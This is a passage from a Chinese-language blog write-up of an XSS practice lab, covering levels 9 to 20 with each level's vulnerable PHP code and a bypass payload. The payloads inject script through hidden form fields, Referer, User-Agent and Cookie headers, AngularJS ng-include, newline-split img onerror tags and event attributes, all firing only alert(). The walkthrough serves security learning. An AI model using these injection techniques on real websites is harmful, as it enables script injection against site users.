<h1 id="level-9"><a href="#level-9" class="headerlink" title="level 9"></a>level 9</h1><h2 id="尝试：-3"><a href="#尝试：-3" class="headerlink" title="尝试："></a>尝试：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看网页源代码，推测要按照他的某个格式来</p>
<img src="/posts/84ce/9.png" class>

<p>在leve9.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token boolean">false</span><span class="token operator">===</span><span class="token function">strpos</span><span class="token punctuation">(</span><span class="token variable">$str7</span><span class="token punctuation">,</span>'http<span class="token punctuation">:</span><span class="token comment" spellcheck="true">//'))   #判断如果字符中没有http://的话就会返回false，</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="payload-8"><a href="#payload-8" class="headerlink" title="payload:"></a>payload:</h2><p>跟level 8差不多，先将unicode编码转换成ASCII码，即将javascript:alert(‘xss’)转换成ASCII码，再在后面加一个真正的网址，如//<a target="_blank" rel="noopener" href="http://www.baidu.com/">http://www.baidu.com</a>  </p>
<h1 id="level-10"><a href="#level-10" class="headerlink" title="level 10"></a>level 10</h1><h2 id="尝试：-4"><a href="#尝试：-4" class="headerlink" title="尝试："></a>尝试：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看源代码，发现有三个隐藏的表单</p>
<img src="/posts/84ce/10.png" class>

<p>分别测试，发现只有t-sort可以写进值（在f12下调试，将表单的type=”hidden”改成type=”text”，再给value取值)</p>
<h2 id="payload-9"><a href="#payload-9" class="headerlink" title="payload:"></a>payload:</h2><h3 id="方法一："><a href="#方法一：" class="headerlink" title="方法一："></a>方法一：</h3><pre class="line-numbers language-php"><code class="language-php"><span class="token operator">?</span>keyword<span class="token operator">=</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span>‘xss’<span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span><span class="token operator">&amp;</span>t_sort<span class="token operator">=</span><span class="token string">"type="</span>text<span class="token string">" onclick="</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>前面的keyword的值不重要，后面的t_sort等于后面的”是闭合value的”</p>
<h3 id="方法二："><a href="#方法二：" class="headerlink" title="方法二："></a>方法二：</h3><p>在控制台中，将值直接添加在其中:</p>
<img src="/posts/84ce/10_2.png" class>

<h1 id="level-11"><a href="#level-11" class="headerlink" title="level 11"></a>level 11</h1><h2 id="尝试：-5"><a href="#尝试：-5" class="headerlink" title="尝试："></a>尝试：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看源代码，发现有四个隐藏的表单：</p>
<img src="/posts/84ce/11.png" class>

<p>和level10差不多，原来t_sort仍然是接受参数值的，但是里面的双引号加了htmlspecialchars()函数被编码了。</p>
<p>在leve11.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str11</span><span class="token operator">=</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string">'HTTP_REFERER'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>   <span class="token shell-comment comment">#在服务器端将请求头中的referer头的值赋给了str11这个变量</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>那么就可以利用这个请求头来绕过。</p>
<h2 id="payload-10"><a href="#payload-10" class="headerlink" title="payload:"></a>payload:</h2><h3 id="方法一：-1"><a href="#方法一：-1" class="headerlink" title="方法一："></a>方法一：</h3><p>用burp进行抓包，发现没有referer这个请求头，可以加上，然后发现我们添加的referer头的值出现在了t_ref标签的value属性值中了。<br>所以可以直接构造：</p>
<pre class="line-numbers language-php"><code class="language-php">referer<span class="token punctuation">:</span><span class="token string">"type="</span>text<span class="token string">" onclick="</span><span class="token function">alert</span><span class="token punctuation">(</span>‘xss’<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/84ce/11_2.png" class>

<p>添加完成之后，点击发送即可。</p>
<h3 id="方法二：-1"><a href="#方法二：-1" class="headerlink" title="方法二："></a>方法二：</h3><p>在控制台中，将值直接添加在其中：</p>
<img src="/posts/84ce/11_3.png" class>

<h1 id="level-12"><a href="#level-12" class="headerlink" title="level 12"></a>level 12</h1><h2 id="尝试：-6"><a href="#尝试：-6" class="headerlink" title="尝试："></a>尝试：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看源代码，发现有四个隐藏的表单：</p>
<img src="/posts/84ce/12.png" class>

<p>和level11差不多，在level 12中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str11</span><span class="token operator">=</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string">'HTTP_USER_AGENT'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>   <span class="token shell-comment comment">#将请求中User-Agent头的值赋给了变量str11</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>可以利用这个请求头来绕过。</p>
<h2 id="payload-11"><a href="#payload-11" class="headerlink" title="payload:"></a>payload:</h2><h3 id="方法一：-2"><a href="#方法一：-2" class="headerlink" title="方法一："></a>方法一：</h3><p>用burp进行抓包,发现我们添加的User-Agent头的值出现在了t_ua标签的value属性值中了。<br>所以可以直接构造：</p>
<pre class="line-numbers language-php"><code class="language-php">User<span class="token operator">-</span>Agent<span class="token punctuation">:</span><span class="token string">"type="</span>text<span class="token string">" onclick="</span><span class="token function">alert</span><span class="token punctuation">(</span>‘xss’<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/84ce/12_2.png" class>

<h3 id="方法二：-2"><a href="#方法二：-2" class="headerlink" title="方法二："></a>方法二：</h3><p>在控制台中，将值直接添加在其中：</p>
<img src="/posts/84ce/12_3.png" class>

<h1 id="level-13"><a href="#level-13" class="headerlink" title="level 13"></a>level 13</h1><h2 id="尝试：-7"><a href="#尝试：-7" class="headerlink" title="尝试："></a>尝试：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看源代码，发现有四个隐藏的表单：</p>
<img src="/posts/84ce/13.png" class>

<p>和level12差不多，在level 13中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str11</span><span class="token operator">=</span><span class="token variable">$_COOKIE</span><span class="token punctuation">[</span><span class="token string">"user"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>    <span class="token shell-comment comment">#将请求中cookie的值赋给了变量str11</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>利用cookie来绕过。</p>
<h2 id="payload-12"><a href="#payload-12" class="headerlink" title="payload:"></a>payload:</h2><h3 id="方法一：-3"><a href="#方法一：-3" class="headerlink" title="方法一："></a>方法一：</h3><p>用burp进行抓包,发现我们添加的cookie的值出现在了t_cook标签的value属性值中了。<br>所以可以直接构造：</p>
<pre class="line-numbers language-php"><code class="language-php">Cookie<span class="token punctuation">:</span> user<span class="token operator">=</span><span class="token string">"type="</span>text<span class="token string">" onclick="</span><span class="token function">alert</span><span class="token punctuation">(</span>‘xss’<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/84ce/13_2.png" class>

<h3 id="方法二：-3"><a href="#方法二：-3" class="headerlink" title="方法二："></a>方法二：</h3><p>在控制台中，将值直接添加在其中</p>
<img src="/posts/84ce/13_3.png" class>

<h1 id="level-14"><a href="#level-14" class="headerlink" title="level 14"></a>level 14</h1><p>本关因iframe调用的文件地址失效，无法进行测试。</p>
<h1 id="level-15"><a href="#level-15" class="headerlink" title="level 15"></a>level 15</h1><p>在level15.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>angular.min.js<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>

<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"src"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token keyword">echo</span> <span class="token string">'&lt;body>&lt;span class="ng-include:'</span><span class="token punctuation">.</span><span class="token function">htmlspecialchars</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token string">'">&lt;/span>&lt;/body>'</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>我们提交的参数src的值被插入到了<span>标签的class属性值中，但是前面还有ng-include这样的字符。</span></p>
<p><strong>ng-include</strong>是angular js中的东西，ng-include指令用于包含外部的HTML文件。</p>
<h2 id="payload-13"><a href="#payload-13" class="headerlink" title="payload:"></a>payload:</h2><pre class="line-numbers language-php"><code class="language-php">src<span class="token operator">=</span><span class="token string">'level1.php?name=&lt;img src=1 onerror=alert(1)>'</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>或者</p>
<pre class="line-numbers language-php"><code class="language-php">src<span class="token operator">=</span><span class="token string">'level1.php?name=&lt;img src=1 onerror=alert(/xss/)>'</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>在img标签中，当src指向一个不明确的地址时，会执行onerror的语句。</p>
<h1 id="level-16"><a href="#level-16" class="headerlink" title="level 16"></a>level 16</h1><p>在level16.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str</span> <span class="token operator">=</span> <span class="token function">strtolower</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"keyword"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  

<span class="token variable">$str2</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"script"</span><span class="token punctuation">,</span><span class="token string">" "</span><span class="token punctuation">,</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  

<span class="token variable">$str3</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">,</span><span class="token string">" "</span><span class="token punctuation">,</span><span class="token variable">$str2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str4</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"/"</span><span class="token punctuation">,</span><span class="token string">" "</span><span class="token punctuation">,</span><span class="token variable">$str3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>说明不能使用大小写绕过，将”script”,” “,”/“替换成了&amp;nbsp</p>
<h2 id="payload："><a href="#payload：" class="headerlink" title="payload："></a>payload：</h2><p>使用一个不需要闭合的标签，且可以用回车(回车用%a来表示)来将它们分开,构造语句：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token markup">&lt;img%0asrc=1%0aonerror=alert(‘xss’)></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h1 id="level17"><a href="#level17" class="headerlink" title="level17"></a>level17</h1><p>level17到level20因为一些浏览器的原因，无法显示图片</p>
<p>但其原理如下：</p>
<h2 id="payload-14"><a href="#payload-14" class="headerlink" title="payload:"></a>payload:</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token operator">?</span>arg01<span class="token operator">=</span> onmousemove<span class="token operator">&amp;</span>arg02<span class="token operator">=</span>javascript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token operator">/</span>xss<span class="token operator">/</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>或者</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token operator">?</span>arg01<span class="token operator">=</span>a<span class="token operator">&amp;</span>arg02<span class="token operator">=</span> onmousemove<span class="token operator">=</span><span class="token string">"alert(/xss/)"</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>或者</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token operator">?</span>arg01<span class="token operator">=</span> onclick<span class="token operator">&amp;</span>arg02<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>输完之后，点击图片，触发鼠标，即可绕过。</p>
<p><strong>注意：以上每一种方法的空格都很重要！！！</strong></p>
<p>或者将a标签的href更改为如下内容，利用javascript伪协议</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>a</span> <span class="token attr-name">href</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>javascript:alert(‘xss’)<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h1 id="level-18"><a href="#level-18" class="headerlink" title="level 18"></a>level 18</h1><p>与level17同理</p>
<h1 id="level-19-level20"><a href="#level-19-level20" class="headerlink" title="level 19-level20"></a>level 19-level20</h1><p>这两关与之前的很相似，只是在于输入的onmouseover事件会被当作普通文本，而双引号又被过滤因此也不能闭合进行绕过，可以F12手动加onmouseover事件通关。</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>文章作者: </span><span class="post-copyright-info"><a href="https://echozt.github.io">echozt</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>文章链接: </span><span class="post-copyright-info"><a href="https://echozt.github.io/posts/84ce.html">https://echozt.github.io/posts/84ce.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来源 <a href="https://echozt.github.io" target="_blank">echozt</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E9%9D%B6%E5%9C%BA/">靶场</a><a class="post-meta__tags" href="/tags/Web%E6%BC%8F%E6%B4%9E/">Web漏洞</a><a class="post-meta__tags" href="/tags/xss/">xss</a></div><div class="post-share"><div class="social-share" data-image="/img/featureimages/7.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><a class="prev-post pull-left" href="/posts/12eb.html" title="ms12-020-导致对方蓝屏"><img class="cover" src="/img/featureimages/0.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">ms12-020-导致对方蓝屏</div></div></a><a class="next-post pull-right" href="/posts/5a76.html" title="ms08-067的相关应用"><img class="cover" src="/img/featureimages/1.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">ms08-067的相关应用</div></div></a></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><a href="/posts/1d0a.html" title="bodgeit靶场"><img class="cover" src="/img/featureimages/5.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-02-26</div><div class="title">bodgeit靶场</div></div></a><a href="/posts/8409.html" title="dvwa靶场"><img class="cover" src="/img/featureimages/5.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-07-07</div><div class="title">dvwa靶场</div></div></a><a href="/posts/6011.html" title="pikachu靶场"><img class="cover" src="/img/featureimages/1.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-04-23</div><div class="title">pikachu靶场</div></div></a><a href="/posts/bb32.html" title="sqli靶场(1~22关)"><img class="cover" src="/img/featureimages/3.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-04-08</div><div class="title">sqli靶场(1~22关)</div></div></a><a href="/posts/fb8a.html" title="sqli靶场(23~37关)"><img class="cover" src="/img/featureimages/5.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-04-10</div><div class="title">sqli靶场(23~37关)</div></div></a><a href="/posts/1702.html" title="upload文件上传靶场"><img class="cover" src="/img/featureimages/6.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-26</div><div class="title">upload文件上传靶场</div></div></a></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info is-center"><div class="avatar-img"><img src="/img/avatar.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">echozt</div><div class="author-info-description">分享知识，记录生活</div><div class="site-data"><a href="/archives/"><div class="headline">文章</div><div class="length-num">49</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">82</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">15</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/echozt"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">基本流程：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-1"><span class="toc-number">2.</span> <span class="toc-text">level 1</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#payload"><span class="toc-number">2.1.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-2"><span class="toc-number">3.</span> <span class="toc-text">level 2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95"><span class="toc-number">3.1.</span> <span class="toc-text">尝试:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-1"><span class="toc-number">3.2.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-3"><span class="toc-number">4.</span> <span class="toc-text">level 3</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%EF%BC%9A"><span class="toc-number">4.1.</span> <span class="toc-text">尝试：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-2"><span class="toc-number">4.2.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-4"><span class="toc-number">5.</span> <span class="toc-text">level 4</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%EF%BC%9A-1"><span class="toc-number">5.1.</span> <span class="toc-text">尝试：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-3"><span class="toc-number">5.2.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-5"><span class="toc-number">6.</span> <span class="toc-text">level 5</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%951%EF%BC%9A"><span class="toc-number">6.1.</span> <span class="toc-text">尝试1：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%952"><span class="toc-number">6.2.</span> <span class="toc-text">尝试2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-4"><span class="toc-number">6.3.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-6"><span class="toc-number">7.</span> <span class="toc-text">level 6</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%951"><span class="toc-number">7.1.</span> <span class="toc-text">尝试1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%952-1"><span class="toc-number">7.2.</span> <span class="toc-text">尝试2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%953"><span class="toc-number">7.3.</span> <span class="toc-text">尝试3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-5"><span class="toc-number">7.4.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-7"><span class="toc-number">8.</span> <span class="toc-text">level 7</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%EF%BC%9A-2"><span class="toc-number">8.1.</span> <span class="toc-text">尝试：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-6"><span class="toc-number">8.2.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-8"><span class="toc-number">9.</span> <span class="toc-text">level 8</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%951%EF%BC%9A-1"><span class="toc-number">9.1.</span> <span class="toc-text">尝试1：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%952-2"><span class="toc-number">9.2.</span> <span class="toc-text">尝试2:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-7"><span class="toc-number">9.3.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-9"><span class="toc-number">10.</span> <span class="toc-text">level 9</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%EF%BC%9A-3"><span class="toc-number">10.1.</span> <span class="toc-text">尝试：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-8"><span class="toc-number">10.2.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-10"><span class="toc-number">11.</span> <span class="toc-text">level 10</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%EF%BC%9A-4"><span class="toc-number">11.1.</span> <span class="toc-text">尝试：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-9"><span class="toc-number">11.2.</span> <span class="toc-text">payload:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A"><span class="toc-number">11.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A"><span class="toc-number">11.2.2.</span> <span class="toc-text">方法二：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-11"><span class="toc-number">12.</span> <span class="toc-text">level 11</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%EF%BC%9A-5"><span class="toc-number">12.1.</span> <span class="toc-text">尝试：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-10"><span class="toc-number">12.2.</span> <span class="toc-text">payload:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-1"><span class="toc-number">12.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-1"><span class="toc-number">12.2.2.</span> <span class="toc-text">方法二：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-12"><span class="toc-number">13.</span> <span class="toc-text">level 12</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%EF%BC%9A-6"><span class="toc-number">13.1.</span> <span class="toc-text">尝试：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-11"><span class="toc-number">13.2.</span> <span class="toc-text">payload:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-2"><span class="toc-number">13.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-2"><span class="toc-number">13.2.2.</span> <span class="toc-text">方法二：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-13"><span class="toc-number">14.</span> <span class="toc-text">level 13</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%EF%BC%9A-7"><span class="toc-number">14.1.</span> <span class="toc-text">尝试：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-12"><span class="toc-number">14.2.</span> <span class="toc-text">payload:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A-3"><span class="toc-number">14.2.1.</span> <span class="toc-text">方法一：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A-3"><span class="toc-number">14.2.2.</span> <span class="toc-text">方法二：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-14"><span class="toc-number">15.</span> <span class="toc-text">level 14</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-15"><span class="toc-number">16.</span> <span class="toc-text">level 15</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-13"><span class="toc-number">16.1.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-16"><span class="toc-number">17.</span> <span class="toc-text">level 16</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#payload%EF%BC%9A"><span class="toc-number">17.1.</span> <span class="toc-text">payload：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level17"><span class="toc-number">18.</span> <span class="toc-text">level17</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#payload-14"><span class="toc-number">18.1.</span> <span class="toc-text">payload:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-18"><span class="toc-number">19.</span> <span class="toc-text">level 